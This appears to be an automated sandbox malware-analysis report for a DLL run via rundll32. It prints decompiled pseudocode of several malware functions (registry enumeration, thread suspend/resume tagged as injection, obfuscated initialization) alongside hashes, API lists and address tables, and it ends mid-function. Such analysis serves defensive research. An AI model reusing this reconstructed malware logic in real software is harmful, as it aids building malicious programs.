                                                          • Instruction ID: aabe3040f64a77384013ec97ca7ce3785de7c4c3b0a9728cfdd1efef68b009ca
                                                          • Opcode Fuzzy Hash: b2d1d6079016bb8b044a3c5268bc91b1c91cf2abebc5de807e8e26128245be02
                                                          • Instruction Fuzzy Hash: F8F0D432606321ABD7631FA1BC0DF5EBA6ABB8A755F548404FB05A1190C72188118FB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D3472 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E036D3472(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x36da3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E036D61FC( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E036D6F28(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E036D6C2C(_a8);
						goto L29;
					}
					_t64 =  *0x36da318; // 0x5969d70
					_t16 = _t64 + 0xc; // 0x5969e92
					_t65 = E036D61FC(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d036d90, executed
						_t67 = E036D4822(_t97,  *_t33, _t91, _a8,  *0x36da3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x36da348; // 0x228d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x36dba4c; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x36dba47; // 0x55434b48
								_t69 = _t34;
							}
							_t70 = E036D62F6(_t69,  *0x36da3d4,  *0x36da3d8,  &_a24,  &_a16); // executed
							if(_t70 == 0) {
								if(_t98 == 0) {
									_t71 =  *0x36da348; // 0x228d5a8
									_t44 = _t71 + 0x36db842; // 0x74666f53
									_t73 = E036D61FC(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d036d90
										E036D74B6( *_t47, _t91, _a8,  *0x36da3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d036d90
										E036D74B6( *_t49, _t91, _t99,  *0x36da3d0, _a16);
										E036D6C2C(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d036d90, executed
									E036D74B6( *_t40, _t91, _a8,  *0x36da3d8, _a24); // executed
									_t43 = _t101 + 0x10; // 0x3d036d90
									E036D74B6( *_t43, _t91, _a8,  *0x36da3d0, _a16);
								}
								if( *_t101 != 0) {
									E036D6C2C(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d036d90, executed
					_t81 = E036D12CA( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d036d90
							E036D4822(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E036D6C2C(_t100);
						_t98 = _a16;
					}
					E036D6C2C(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E036D7A1E(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x36da3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}


























                                                          0x036d3472
                                                          0x036d347b
                                                          0x036d3482
                                                          0x036d3487
                                                          0x036d34f4
                                                          0x036d34fa
                                                          0x036d34ff
                                                          0x036d3506
                                                          0x036d350b
                                                          0x036d3510
                                                          0x036d367b
                                                          0x036d3682
                                                          0x036d3682
                                                          0x036d3687
                                                          0x036d3689
                                                          0x036d3689
                                                          0x036d3692
                                                          0x036d3692
                                                          0x036d3516
                                                          0x036d351b
                                                          0x036d3522
                                                          0x036d3671
                                                          0x036d3674
                                                          0x00000000
                                                          0x036d3674
                                                          0x036d3528
                                                          0x036d352d
                                                          0x036d3530
                                                          0x036d3535
                                                          0x036d353a
                                                          0x036d3583
                                                          0x036d3583
                                                          0x036d3596
                                                          0x036d3599
                                                          0x036d35a0
                                                          0x036d35a6
                                                          0x036d35ad
                                                          0x036d35b7
                                                          0x036d35b7
                                                          0x036d35af
                                                          0x036d35af
                                                          0x036d35af
                                                          0x036d35af
                                                          0x036d35d2
                                                          0x036d35d9
                                                          0x036d35e1
                                                          0x036d360f
                                                          0x036d3614
                                                          0x036d361b
                                                          0x036d3620
                                                          0x036d3624
                                                          0x036d3656
                                                          0x036d3626
                                                          0x036d3633
                                                          0x036d3636
                                                          0x036d3646
                                                          0x036d3649
                                                          0x036d364f
                                                          0x036d364f
                                                          0x036d35e3
                                                          0x036d35f0
                                                          0x036d35f3
                                                          0x036d3605
                                                          0x036d3608
                                                          0x036d3608
                                                          0x036d3660
                                                          0x036d366c
                                                          0x036d3662
                                                          0x036d3665
                                                          0x036d3665
                                                          0x036d3660
                                                          0x036d35d9
                                                          0x00000000
                                                          0x036d35a0
                                                          0x036d3549
                                                          0x036d354c
                                                          0x036d3553
                                                          0x036d3559
                                                          0x036d355c
                                                          0x036d355e
                                                          0x036d356a
                                                          0x036d356d
                                                          0x036d356d
                                                          0x036d3573
                                                          0x036d3578
                                                          0x036d3578
                                                          0x036d357e
                                                          0x00000000
                                                          0x036d357e
                                                          0x036d348c
                                                          0x00000000
                                                          0x036d34b3
                                                          0x036d34b3
                                                          0x036d34bf
                                                          0x036d34d2
                                                          0x036d34d8
                                                          0x036d34e0
                                                          0x00000000
                                                          0x036d34e0

                                                          APIs
                                                          • StrChrA.SHLWAPI(036D7168,0000005F,00000000,00000000,00000104), ref: 036D34A5
                                                          • lstrcpy.KERNEL32(?,?), ref: 036D34D2
                                                            • Part of subcall function 036D61FC: lstrlen.KERNEL32(?,00000000,05969D70,00000000,036D39E8,05969F93,69B25F44,?,?,?,?,69B25F44,00000005,036DA00C,4D283A53,?), ref: 036D6203
                                                            • Part of subcall function 036D61FC: mbstowcs.NTDLL ref: 036D622C
                                                            • Part of subcall function 036D61FC: memset.NTDLL ref: 036D623E
                                                            • Part of subcall function 036D74B6: lstrlenW.KERNEL32(?,?,?,036D363B,3D036D90,80000002,036D7168,036D7283,74666F53,4D4C4B48,036D7283,?,3D036D90,80000002,036D7168,?), ref: 036D74DB
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 036D34F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: f7a40a22e11d38c4f2055b102c47e50df9e2b44fe5dfdbc745009161b62915aa
                                                          • Instruction ID: 7bf7aada2fdb45ae70748664c5b6c2554cb8374fec908c5471e0d3987dd66b1d
                                                          • Opcode Fuzzy Hash: f7a40a22e11d38c4f2055b102c47e50df9e2b44fe5dfdbc745009161b62915aa
                                                          • Instruction Fuzzy Hash: 96517D7AD00209EFCF22EFA0DD40EAA7BBAEF08340F158518F9159A364D735D925EB15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628ED07 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110threadsynchronizationinjectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 0628ED35
                                                          • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0628EDBF
                                                          • WaitForSingleObject.KERNEL32(00000064), ref: 0628EDCD
                                                          • SuspendThread.KERNEL32(?), ref: 0628EDE0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                                          • String ID: v
                                                          • API String ID: 3168247402-1801730948
                                                          • Opcode ID: d776bc79af66495a5a285be447e54e12ebc1029a88a8aae178c165f284520a5c
                                                          • Instruction ID: 02da399db4cb234abaf3169dc1f739d42803fc305e36c7625a31f554200f454a
                                                          • Opcode Fuzzy Hash: d776bc79af66495a5a285be447e54e12ebc1029a88a8aae178c165f284520a5c
                                                          • Instruction Fuzzy Hash: F5417B71515302AFE7A1EF50CC4096BBBEAFF88710F04492DFAD4921A0D732D914CB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D71B6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98registrysynchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D71B6(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E036D6D63(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E036D6C2C(_v28);
							goto L17;
						}
						_t42 = E036D3472(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E036D6C2C(_v24);
						_v20 = _v16;
						_t47 = E036D6D63(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x36da30c, 0) == 0x102);
				goto L16;
			}

















                                                          0x036d71b6
                                                          0x036d71d0
                                                          0x036d71d3
                                                          0x036d71d6
                                                          0x036d71d9
                                                          0x036d71dc
                                                          0x036d71e2
                                                          0x036d71e6
                                                          0x036d72c0
                                                          0x036d72c4
                                                          0x036d72c4
                                                          0x036d71ef
                                                          0x036d71f6
                                                          0x036d71fb
                                                          0x036d7200
                                                          0x036d72b5
                                                          0x036d72b8
                                                          0x00000000
                                                          0x036d72be
                                                          0x036d7206
                                                          0x036d7209
                                                          0x036d7210
                                                          0x036d721a
                                                          0x036d7223
                                                          0x036d7229
                                                          0x036d7231
                                                          0x036d7269
                                                          0x036d72a3
                                                          0x036d72a9
                                                          0x036d72ab
                                                          0x036d72ab
                                                          0x036d72ad
                                                          0x036d72b0
                                                          0x00000000
                                                          0x036d72b0
                                                          0x036d727e
                                                          0x036d7283
                                                          0x036d7287
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d7287
                                                          0x036d7236
                                                          0x036d7245
                                                          0x00000000
                                                          0x00000000
                                                          0x036d724a
                                                          0x036d7253
                                                          0x036d7256
                                                          0x036d725b
                                                          0x036d7260
                                                          0x036d723b
                                                          0x036d723b
                                                          0x00000000
                                                          0x036d723b
                                                          0x036d7264
                                                          0x00000000
                                                          0x036d7264
                                                          0x036d7238
                                                          0x00000000
                                                          0x036d7289
                                                          0x036d7296
                                                          0x00000000

                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,036D7168,?), ref: 036D71DC
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • RegEnumKeyExA.KERNEL32(?,?,?,036D7168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,036D7168), ref: 036D7223
                                                          • WaitForSingleObject.KERNEL32(00000000,?,?,?,036D7168,?,036D7168,?,?,?,?,?,036D7168,?), ref: 036D7290
                                                          • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,036D7168,?), ref: 036D72B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                                          • String ID: !s
                                                          • API String ID: 3664505660-1801701826
                                                          • Opcode ID: db61a68dea8f2d759619cfbe215cb03abdcdd9cf3e4576071315693e5e3eb339
                                                          • Instruction ID: b854e807d2184e84350f9ea3c498b6e02507be65039db9bcd2ad65f0feca427f
                                                          • Opcode Fuzzy Hash: db61a68dea8f2d759619cfbe215cb03abdcdd9cf3e4576071315693e5e3eb339
                                                          • Instruction Fuzzy Hash: 6B314776C00259ABCF22EFA5ED84DEEFFB9EB88710F14406AF911B6254D2710A50CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D3D2C Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 57%
                                                          			E036D3D2C(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E036D3CFD();
				if(_t21 != 0) {
					_t59 =  *0x36da2fc; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x36da2fc = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x36da178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E036D389E( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x36da348; // 0x228d5a8
					if( *0x36da2fc > 5) {
						_t8 = _t26 + 0x36db5c5; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x36db9fd; // 0x44283a44
						_t27 = _t7;
					}
					E036D6B80(_t27, _t27);
					_t31 = E036D76BB(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x36da310 =  *0x36da310 ^ 0x81bbe65d;
						_t32 = E036D6D63(0x60);
						 *0x36da3cc = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x36da3cc; // 0x59695b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x36da3cc; // 0x59695b0
							 *_t51 = 0x36db827;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x36da2d8, 0, 0x43);
							 *0x36da368 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x36da2fc; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x36da348; // 0x228d5a8
								_t13 = _t58 + 0x36db552; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x36d9287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E036D3365( ~_v8 &  *0x36da310, 0x36da00c); // executed
								_t42 = E036D1645(0, _t55, _t63, 0x36da00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E036D3981(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E036D661D(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E036D529C(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x36da17c(); // executed
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E036D7928(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                                          0x036d3d2c
                                                          0x036d3d36
                                                          0x036d3d39
                                                          0x036d3d3c
                                                          0x036d3d3f
                                                          0x036d3d46
                                                          0x036d3d48
                                                          0x036d3d54
                                                          0x036d3d56
                                                          0x036d3d56
                                                          0x036d3d5f
                                                          0x036d3d65
                                                          0x036d3d6a
                                                          0x036d3d84
                                                          0x036d3d90
                                                          0x036d3d92
                                                          0x036d3d97
                                                          0x036d3da1
                                                          0x036d3da1
                                                          0x036d3d99
                                                          0x036d3d99
                                                          0x036d3d99
                                                          0x036d3d99
                                                          0x036d3da8
                                                          0x036d3db5
                                                          0x036d3dbc
                                                          0x036d3dc1
                                                          0x036d3dc1
                                                          0x036d3dca
                                                          0x036d3dcd
                                                          0x036d3df3
                                                          0x036d3dff
                                                          0x036d3e04
                                                          0x036d3e09
                                                          0x036d3e0b
                                                          0x036d3e37
                                                          0x036d3e39
                                                          0x036d3e0d
                                                          0x036d3e11
                                                          0x036d3e16
                                                          0x036d3e1b
                                                          0x036d3e22
                                                          0x036d3e28
                                                          0x036d3e2d
                                                          0x036d3e33
                                                          0x036d3e3a
                                                          0x036d3e3c
                                                          0x036d3e3e
                                                          0x036d3e4d
                                                          0x036d3e53
                                                          0x036d3e58
                                                          0x036d3e5a
                                                          0x036d3e8a
                                                          0x036d3e8c
                                                          0x036d3e5c
                                                          0x036d3e5c
                                                          0x036d3e62
                                                          0x036d3e6f
                                                          0x036d3e75
                                                          0x036d3e75
                                                          0x036d3e7d
                                                          0x036d3e86
                                                          0x036d3e8d
                                                          0x036d3e8f
                                                          0x036d3e91
                                                          0x036d3e98
                                                          0x036d3ea5
                                                          0x036d3eaa
                                                          0x036d3eaf
                                                          0x036d3eb1
                                                          0x036d3eb3
                                                          0x00000000
                                                          0x00000000
                                                          0x036d3eb5
                                                          0x036d3eba
                                                          0x036d3ebc
                                                          0x036d3ec3
                                                          0x036d3ec7
                                                          0x036d3eca
                                                          0x036d3edf
                                                          0x036d3ee3
                                                          0x036d3ee8
                                                          0x00000000
                                                          0x036d3ee8
                                                          0x036d3ecc
                                                          0x036d3ece
                                                          0x00000000
                                                          0x00000000
                                                          0x036d3ed9
                                                          0x036d3edb
                                                          0x036d3edd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d3edd
                                                          0x036d3ec0
                                                          0x036d3ec0
                                                          0x036d3e91
                                                          0x036d3dcf
                                                          0x036d3dcf
                                                          0x036d3dd4
                                                          0x036d3eea
                                                          0x036d3eef
                                                          0x036d3ef7
                                                          0x036d3ef7
                                                          0x00000000
                                                          0x036d3eef
                                                          0x036d3dda
                                                          0x036d3ddd
                                                          0x036d3de7
                                                          0x036d3dee
                                                          0x00000000
                                                          0x036d3eff
                                                          0x036d3eff
                                                          0x036d3f02
                                                          0x036d3f06
                                                          0x036d3f06

                                                          APIs
                                                            • Part of subcall function 036D3CFD: GetModuleHandleA.KERNEL32(4C44544E,00000000,036D3D44,00000001), ref: 036D3D0C
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 036D3DC1
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • memset.NTDLL ref: 036D3E11
                                                          • RtlInitializeCriticalSection.NTDLL(05969570), ref: 036D3E22
                                                            • Part of subcall function 036D529C: memset.NTDLL ref: 036D52B6
                                                            • Part of subcall function 036D529C: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 036D52FC
                                                            • Part of subcall function 036D529C: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 036D5307
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 036D3E4D
                                                          • wsprintfA.USER32 ref: 036D3E7D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
                                                          • Opcode ID: 5b226d54084299a65ece264d49762c3c9ee2ecae0d2315f0626b2b4d438ee74f
                                                          • Instruction ID: 2528ed164ca509ea2f12bef57be957ffeb7e296f5f65a6895b349c253ce10f9b
                                                          • Opcode Fuzzy Hash: 5b226d54084299a65ece264d49762c3c9ee2ecae0d2315f0626b2b4d438ee74f
                                                          • Instruction Fuzzy Hash: E8511779E05324ABDB10FFE5DD84F6E77B8AB08700F28045AE502EB38CE77195508B96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D19E2 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 22%
                                                          			E036D19E2(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E036D6D63(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E036D6C2C(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E036D6D63((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x36da318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                          0x036d19e9
                                                          0x036d19f0
                                                          0x036d19f5
                                                          0x036d19f8
                                                          0x036d19ff
                                                          0x036d1a02
                                                          0x036d1a05
                                                          0x036d1a0a
                                                          0x036d1a0f
                                                          0x036d1b63
                                                          0x036d1b65
                                                          0x036d1b67
                                                          0x036d1b6c
                                                          0x036d1b6c
                                                          0x036d1a15
                                                          0x036d1a18
                                                          0x036d1a1b
                                                          0x036d1a1d
                                                          0x036d1a1d
                                                          0x036d1a21
                                                          0x00000000
                                                          0x00000000
                                                          0x036d1a25
                                                          0x036d1a51
                                                          0x036d1a56
                                                          0x036d1a58
                                                          0x036d1a58
                                                          0x036d1a5b
                                                          0x036d1a5e
                                                          0x036d1a5e
                                                          0x036d1a60
                                                          0x00000000
                                                          0x036d1a2b
                                                          0x036d1a2d
                                                          0x036d1a4c
                                                          0x036d1a4c
                                                          0x036d1a63
                                                          0x036d1a63
                                                          0x036d1a64
                                                          0x036d1a64
                                                          0x036d1a67
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d1a67
                                                          0x036d1a31
                                                          0x036d1a78
                                                          0x036d1a7c
                                                          0x036d1b56
                                                          0x036d1b58
                                                          0x036d1b58
                                                          0x036d1b59
                                                          0x036d1b5c
                                                          0x00000000
                                                          0x036d1b5c
                                                          0x036d1a85
                                                          0x036d1a96
                                                          0x036d1a9a
                                                          0x036d1b52
                                                          0x00000000
